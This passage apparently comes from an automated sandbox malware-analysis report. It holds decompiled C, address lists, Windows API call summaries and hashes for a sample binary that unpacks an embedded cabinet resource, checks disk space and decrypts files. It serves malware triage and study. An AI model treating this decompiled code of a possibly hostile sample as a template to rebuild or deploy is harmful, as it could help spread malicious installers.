                                                                                                                                                                                                                                              						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                              						_t110 = 0x4b0;
                                                                                                                                                                                                                                              						L30:
                                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                                              						E009744B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                              						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                              						L31:
                                                                                                                                                                                                                                              						_t66 = 0;
                                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                                              						L32:
                                                                                                                                                                                                                                              						_pop(_t114);
                                                                                                                                                                                                                                              						goto L33;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                              					_v812 = _t69;
                                                                                                                                                                                                                                              					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                              					__eflags = _t116;
                                                                                                                                                                                                                                              					if(_t116 == 0) {
                                                                                                                                                                                                                                              						goto L29;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                              					__eflags = _t73;
                                                                                                                                                                                                                                              					if(_t73 != 0) {
                                                                                                                                                                                                                                              						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                              						_t101 =  &_v16;
                                                                                                                                                                                                                                              						_t111 = 6;
                                                                                                                                                                                                                                              						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                              						__eflags = _t119;
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                              							__eflags = _t22;
                                                                                                                                                                                                                                              							if(_t22 == 0) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                              							__eflags = _t87;
                                                                                                                                                                                                                                              							if(_t87 == 0) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *_t101 = _t87;
                                                                                                                                                                                                                                              							_t101 = _t101 + 1;
                                                                                                                                                                                                                                              							_t111 = _t111 - 1;
                                                                                                                                                                                                                                              							__eflags = _t111;
                                                                                                                                                                                                                                              							if(_t111 != 0) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t111;
                                                                                                                                                                                                                                              						if(_t111 == 0) {
                                                                                                                                                                                                                                              							_t101 = _t101 - 1;
                                                                                                                                                                                                                                              							__eflags = _t101;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *_t101 = 0;
                                                                                                                                                                                                                                              						_t112 = 0x200;
                                                                                                                                                                                                                                              						_t102 = _v812;
                                                                                                                                                                                                                                              						_t78 = 0;
                                                                                                                                                                                                                                              						_t118 = 8;
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                              							if(_t102 == _t112) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                              							_t78 = _t78 + 1;
                                                                                                                                                                                                                                              							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                              							if(_t78 < _t118) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                              						if(_t78 != _t118) {
                                                                                                                                                                                                                                              							__eflags =  *0x979a34 & 0x00000008;
                                                                                                                                                                                                                                              							if(( *0x979a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                              								L20:
                                                                                                                                                                                                                                              								_t103 =  *0x979a38; // 0x0
                                                                                                                                                                                                                                              								_t110 =  *((intOrPtr*)(0x9789e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                              								L21:
                                                                                                                                                                                                                                              								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                              								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                              									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                              									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								if(__eflags <= 0) {
                                                                                                                                                                                                                                              									 *0x979124 = 0;
                                                                                                                                                                                                                                              									_t66 = 1;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t66 = E0097268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                              							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t105 =  *0x979a38; // 0x0
                                                                                                                                                                                                                                              							_t110 =  *((intOrPtr*)(0x9789e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x9789e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                              							_t103 = (_t105 >> 2) +  *0x979a38;
                                                                                                                                                                                                                                              							goto L21;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t110 = 0x4c5;
                                                                                                                                                                                                                                              						E009744B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						goto L31;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                              					_t110 = 0x4f9;
                                                                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t110 = 0x4bc;
                                                                                                                                                                                                                                              					E009744B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					_t66 = 0;
                                                                                                                                                                                                                                              					L33:
                                                                                                                                                                                                                                              					return E00976CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}



































                                                                                                                                                                                                                                              0x0097597d
                                                                                                                                                                                                                                              0x00975988
                                                                                                                                                                                                                                              0x0097598f
                                                                                                                                                                                                                                              0x0097599a
                                                                                                                                                                                                                                              0x009759a6
                                                                                                                                                                                                                                              0x009759a8
                                                                                                                                                                                                                                              0x009759af
                                                                                                                                                                                                                                              0x009759b9
                                                                                                                                                                                                                                              0x009759dd
                                                                                                                                                                                                                                              0x009759e4
                                                                                                                                                                                                                                              0x009759f1
                                                                                                                                                                                                                                              0x009759fe
                                                                                                                                                                                                                                              0x00975a0b
                                                                                                                                                                                                                                              0x00975a13
                                                                                                                                                                                                                                              0x00975a19
                                                                                                                                                                                                                                              0x00975a1b
                                                                                                                                                                                                                                              0x00975ba1
                                                                                                                                                                                                                                              0x00975baf
                                                                                                                                                                                                                                              0x00975bbd
                                                                                                                                                                                                                                              0x00975bd8
                                                                                                                                                                                                                                              0x00975bde
                                                                                                                                                                                                                                              0x00975be3
                                                                                                                                                                                                                                              0x00975bec
                                                                                                                                                                                                                                              0x00975bf0
                                                                                                                                                                                                                                              0x00975bfc
                                                                                                                                                                                                                                              0x00975c02
                                                                                                                                                                                                                                              0x00975c02
                                                                                                                                                                                                                                              0x00975c02
                                                                                                                                                                                                                                              0x00975c04
                                                                                                                                                                                                                                              0x00975c04
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975c04
                                                                                                                                                                                                                                              0x00975a27
                                                                                                                                                                                                                                              0x00975a3a
                                                                                                                                                                                                                                              0x00975a46
                                                                                                                                                                                                                                              0x00975a48
                                                                                                                                                                                                                                              0x00975a4a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975a64
                                                                                                                                                                                                                                              0x00975a6a
                                                                                                                                                                                                                                              0x00975a6c
                                                                                                                                                                                                                                              0x00975abc
                                                                                                                                                                                                                                              0x00975ac2
                                                                                                                                                                                                                                              0x00975ac9
                                                                                                                                                                                                                                              0x00975aca
                                                                                                                                                                                                                                              0x00975aca
                                                                                                                                                                                                                                              0x00975acc
                                                                                                                                                                                                                                              0x00975acc
                                                                                                                                                                                                                                              0x00975acf
                                                                                                                                                                                                                                              0x00975ad1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975ad3
                                                                                                                                                                                                                                              0x00975ad6
                                                                                                                                                                                                                                              0x00975ad8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975ada
                                                                                                                                                                                                                                              0x00975adc
                                                                                                                                                                                                                                              0x00975add
                                                                                                                                                                                                                                              0x00975add
                                                                                                                                                                                                                                              0x00975ae0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975ae0
                                                                                                                                                                                                                                              0x00975ae2
                                                                                                                                                                                                                                              0x00975ae4
                                                                                                                                                                                                                                              0x00975ae6
                                                                                                                                                                                                                                              0x00975ae6
                                                                                                                                                                                                                                              0x00975ae6
                                                                                                                                                                                                                                              0x00975ae9
                                                                                                                                                                                                                                              0x00975aeb
                                                                                                                                                                                                                                              0x00975af0
                                                                                                                                                                                                                                              0x00975af6
                                                                                                                                                                                                                                              0x00975af8
                                                                                                                                                                                                                                              0x00975af9
                                                                                                                                                                                                                                              0x00975af9
                                                                                                                                                                                                                                              0x00975afb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975afd
                                                                                                                                                                                                                                              0x00975aff
                                                                                                                                                                                                                                              0x00975b00
                                                                                                                                                                                                                                              0x00975b03
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975b03
                                                                                                                                                                                                                                              0x00975b05
                                                                                                                                                                                                                                              0x00975b08
                                                                                                                                                                                                                                              0x00975b20
                                                                                                                                                                                                                                              0x00975b27
                                                                                                                                                                                                                                              0x00975b52
                                                                                                                                                                                                                                              0x00975b52
                                                                                                                                                                                                                                              0x00975b5b
                                                                                                                                                                                                                                              0x00975b62
                                                                                                                                                                                                                                              0x00975b6b
                                                                                                                                                                                                                                              0x00975b6d
                                                                                                                                                                                                                                              0x00975b76
                                                                                                                                                                                                                                              0x00975b7d
                                                                                                                                                                                                                                              0x00975b83
                                                                                                                                                                                                                                              0x00975b7f
                                                                                                                                                                                                                                              0x00975b7f
                                                                                                                                                                                                                                              0x00975b7f
                                                                                                                                                                                                                                              0x00975b6f
                                                                                                                                                                                                                                              0x00975b72
                                                                                                                                                                                                                                              0x00975b72
                                                                                                                                                                                                                                              0x00975b85
                                                                                                                                                                                                                                              0x00975b98
                                                                                                                                                                                                                                              0x00975b9e
                                                                                                                                                                                                                                              0x00975b87
                                                                                                                                                                                                                                              0x00975b8f
                                                                                                                                                                                                                                              0x00975b8f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975b85
                                                                                                                                                                                                                                              0x00975b29
                                                                                                                                                                                                                                              0x00975b33
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975b35
                                                                                                                                                                                                                                              0x00975b48
                                                                                                                                                                                                                                              0x00975b4a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975b4a
                                                                                                                                                                                                                                              0x00975b0f
                                                                                                                                                                                                                                              0x00975b16
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975b16
                                                                                                                                                                                                                                              0x00975a7c
                                                                                                                                                                                                                                              0x00975a8a
                                                                                                                                                                                                                                              0x00975aa5
                                                                                                                                                                                                                                              0x00975aab
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009759bb
                                                                                                                                                                                                                                              0x009759c0
                                                                                                                                                                                                                                              0x009759c7
                                                                                                                                                                                                                                              0x009759d1
                                                                                                                                                                                                                                              0x009759d6
                                                                                                                                                                                                                                              0x00975c05
                                                                                                                                                                                                                                              0x00975c14
                                                                                                                                                                                                                                              0x00975c14

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009759A8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 009759AF
                                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00975A13
                                                                                                                                                                                                                                              • MulDiv.KERNEL32(?,?,00000400), ref: 00975A40
                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00975A64
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00975A7C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00975A98
                                                                                                                                                                                                                                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00975AA5
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00975BFC
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                                • Part of subcall function 00976285: GetLastError.KERNEL32(00975BBC), ref: 00976285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4237285672-0
                                                                                                                                                                                                                                              • Opcode ID: fd857b9829275cd78ad6a90774c0b2af1265c6081f70d892646c038c5039c8ab
                                                                                                                                                                                                                                              • Instruction ID: 4f89ec62a2a54d08a5557519d8660af7236cc3fc54b3b6c293d43abd1a77061d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd857b9829275cd78ad6a90774c0b2af1265c6081f70d892646c038c5039c8ab
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4971C3B3A1420CAFEB559B60CC85FFB77ACEB88300F4584A9F54DD2140EA749E84DB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 374 974fe0-97501a call 97468f FindResourceA LoadResource LockResource 377 975161-975163 374->377 378 975020-975027 374->378 379 975057-97505e call 974efd 378->379 380 975029-975051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 975060-975077 call 9744b9 379->383 384 97507c-9750b4 379->384 380->379 390 975107-97510e 383->390 388 9750b6-9750da 384->388 389 9750e8-975104 call 9744b9 384->389 400 975106 388->400 401 9750dc 388->401 389->400 392 975110-975117 FreeResource 390->392 393 97511d-97511f 390->393 392->393 396 975121-975127 393->396 397 97513a-975141 393->397 396->397 402 975129-975135 call 9744b9 396->402 398 975143-97514a 397->398 399 97515f 397->399 398->399 403 97514c-975159 SendMessageA 398->403 399->377 400->390 405 9750e3-9750e6 401->405 402->397 403->399 405->389 405->400
                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E00974FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t9;
                                                                                                                                                                                                                                              				int _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t27;
                                                                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				CHAR* _t36;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t36 = "CABINET";
                                                                                                                                                                                                                                              				 *0x979144 = E0097468F(_t36, 0, 0);
                                                                                                                                                                                                                                              				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                              				 *0x979140 = _t8;
                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					return _t8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t9 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              				if(_t9 != 0) {
                                                                                                                                                                                                                                              					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                              					ShowWindow(GetDlgItem( *0x978584, 0x841), 5);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t10 = E00974EFD(0, 0);
                                                                                                                                                                                                                                              				if(_t10 != 0) {
                                                                                                                                                                                                                                              					__imp__#20(E00974CA0, E00974CC0, E00974980, E00974A50, E00974AD0, E00974B60, E00974BC0, 1, 0x979148, _t33);
                                                                                                                                                                                                                                              					_t34 = _t10;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						_t29 =  *0x979148; // 0x0
                                                                                                                                                                                                                                              						_t24 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              						E009744B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__#22(_t34, "*MEMCAB", 0x971140, 0, E00974CD0, 0, 0x979140); // executed
                                                                                                                                                                                                                                              					_t37 = _t10;
                                                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                              					if(_t10 != 0) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              					E009744B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_t12 =  *0x979140; // 0x0
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						FreeResource(_t12);
                                                                                                                                                                                                                                              						 *0x979140 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                                                              						_t47 =  *0x9791d8; // 0x0
                                                                                                                                                                                                                                              						if(_t47 == 0) {
                                                                                                                                                                                                                                              							E009744B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(( *0x978a38 & 0x00000001) == 0 && ( *0x979a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              						SendMessageA( *0x978584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return _t37;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}
















                                                                                                                                                                                                                                              0x00974fe0
                                                                                                                                                                                                                                              0x00974fe6
                                                                                                                                                                                                                                              0x00974ff9
                                                                                                                                                                                                                                              0x0097500d
                                                                                                                                                                                                                                              0x00975013
                                                                                                                                                                                                                                              0x0097501a
                                                                                                                                                                                                                                              0x00975163
                                                                                                                                                                                                                                              0x00975163
                                                                                                                                                                                                                                              0x00975020
                                                                                                                                                                                                                                              0x00975027
                                                                                                                                                                                                                                              0x00975037
                                                                                                                                                                                                                                              0x00975051
                                                                                                                                                                                                                                              0x00975051
                                                                                                                                                                                                                                              0x00975057
                                                                                                                                                                                                                                              0x0097505e
                                                                                                                                                                                                                                              0x009750a7
                                                                                                                                                                                                                                              0x009750ad
                                                                                                                                                                                                                                              0x009750b4
                                                                                                                                                                                                                                              0x009750e8
                                                                                                                                                                                                                                              0x009750e8
                                                                                                                                                                                                                                              0x009750ee
                                                                                                                                                                                                                                              0x009750ff
                                                                                                                                                                                                                                              0x00975104
                                                                                                                                                                                                                                              0x00975106
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975106
                                                                                                                                                                                                                                              0x009750cd
                                                                                                                                                                                                                                              0x009750d3
                                                                                                                                                                                                                                              0x009750da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009750dd
                                                                                                                                                                                                                                              0x009750e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975060
                                                                                                                                                                                                                                              0x00975060
                                                                                                                                                                                                                                              0x00975070
                                                                                                                                                                                                                                              0x00975075
                                                                                                                                                                                                                                              0x00975107
                                                                                                                                                                                                                                              0x00975107
                                                                                                                                                                                                                                              0x0097510e
                                                                                                                                                                                                                                              0x00975111
                                                                                                                                                                                                                                              0x00975117
                                                                                                                                                                                                                                              0x00975117
                                                                                                                                                                                                                                              0x0097511f
                                                                                                                                                                                                                                              0x00975121
                                                                                                                                                                                                                                              0x00975127
                                                                                                                                                                                                                                              0x00975135
                                                                                                                                                                                                                                              0x00975135
                                                                                                                                                                                                                                              0x00975127
                                                                                                                                                                                                                                              0x00975141
                                                                                                                                                                                                                                              0x00975159
                                                                                                                                                                                                                                              0x00975159
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097515f

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00974FFE
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00975006
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 0097500D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000000,00000842), ref: 00975030
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00975037
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000841,00000005), ref: 0097504A
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00975051
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00975111
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00975159
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                              • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                              • Opcode ID: 1386ef88cc103e1f98210af7566dec3e67deb58f4f87f7c77a3b98220f82deb8
                                                                                                                                                                                                                                              • Instruction ID: bbed4359529f06e5414c25fbab6a0daea8c07ea4b067e8477674ad931dfc7914
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1386ef88cc103e1f98210af7566dec3e67deb58f4f87f7c77a3b98220f82deb8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE3107B379C301AFE7205B61AC8DF6B379CF785759F458024F90DA21A2DBB4CC80A655
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 450 972f1d-972f3d 451 972f3f-972f46 450->451 452 972f6c-972f73 call 975164 450->452 453 972f5f-972f66 call 973a3f 451->453 454 972f48 call 9751e5 451->454 459 973041 452->459 460 972f79-972f80 call 9755a0 452->460 453->452 453->459 461 972f4d-972f4f 454->461 464 973043-973053 call 976ce0 459->464 460->459 468 972f86-972fbe GetSystemDirectoryA call 97658a LoadLibraryA 460->468 461->459 465 972f55-972f5d 461->465 465->452 465->453 472 972ff7-973004 FreeLibrary 468->472 473 972fc0-972fd4 GetProcAddress 468->473 475 973017-973024 SetCurrentDirectoryA 472->475 476 973006-97300c 472->476 473->472 474 972fd6-972fee DecryptFileA 473->474 474->472 486 972ff0-972ff5 474->486 477 973026-97303c call 9744b9 call 976285 475->477 478 973054-97305a 475->478 476->475 479 97300e call 97621e 476->479 477->459 482 973065-97306c 478->482 483 97305c call 973b26 478->483 490 973013-973015 479->490 488 97306e-973075 call 97256d 482->488 489 97307c-973089 482->489 495 973061-973063 483->495 486->472 496 97307a 488->496 492 9730a1-9730a9 489->492 493 97308b-973091 489->493 490->459 490->475 499 9730b4-9730b7 492->499 500 9730ab-9730ad 492->500 493->492 497 973093 call 973ba2 493->497 495->459 495->482 496->489 503 973098-97309a 497->503 499->464 500->499 502 9730af call 974169 500->502 502->499 503->459 505 97309c 503->505 505->492
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00972F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v272;
